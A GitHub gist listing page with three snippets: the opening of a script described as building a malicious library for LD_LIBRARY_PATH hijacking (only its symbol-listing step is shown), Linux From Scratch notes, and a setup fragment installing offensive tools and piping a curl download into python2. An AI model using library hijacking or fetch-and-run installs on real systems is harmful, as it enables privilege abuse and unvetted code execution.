Skip to content

Instantly share code, notes, and snippets.

View daniruiz's full-sized avatar
🥶

daniruiz daniruiz

🥶
View GitHub Profile
@daniruiz
daniruiz / ld_library_path_exploit.sh
Last active November 3, 2024 15:38
Script that automatically generates malicious library and exploits binary through LD_LIBRARY_PATH Hijacking. The script generates the list of missing symbols, based on the specified library, and creates the version-script map file to avoid error messages when loading the new created malicious library.
#!/bin/sh
# ./ld_path_exploit.sh /usr/lib/libgpg-error.so.0 top
TARGET_LIB=$1
MISSING_SYMBOLS="$(readelf -s --wide ${TARGET_LIB} \
| grep 'FUNC\|OBJECT' \
| grep -v 'UND\|ABS' \
| awk '{print $8}' \
@daniruiz
daniruiz / 1.simplified_LFS.md
Last active January 27, 2024 15:57
My Linux From Scratch notes for x86_64 EFI system

My Linux From Scratch notes for x86_64 EFI system

The goal of this guide is to provide a simplified version of the Linux From Scratch project, with steps organized in short sections that give you the satisfaction of testing each progress.

One key difference of this approach is that instead of building all the packages and tools that are part of a regular Linux OS, we start with a basic system based on the kernel and BusyBox, a simple binary that provides all the required commands.

Later we will continue adding packages and configurations until we get a system similar to the original LFS project.

Reference Links:

##################################################
# Packages
# $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass raven
# Install flatpak
# -> https://www.kali.org/docs/tools/flatpak/
# urlencode:
# $ sudo apt install gridsite-clients
# Python2 pip
# $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2"
# Cool Hollywood screensaver ❤️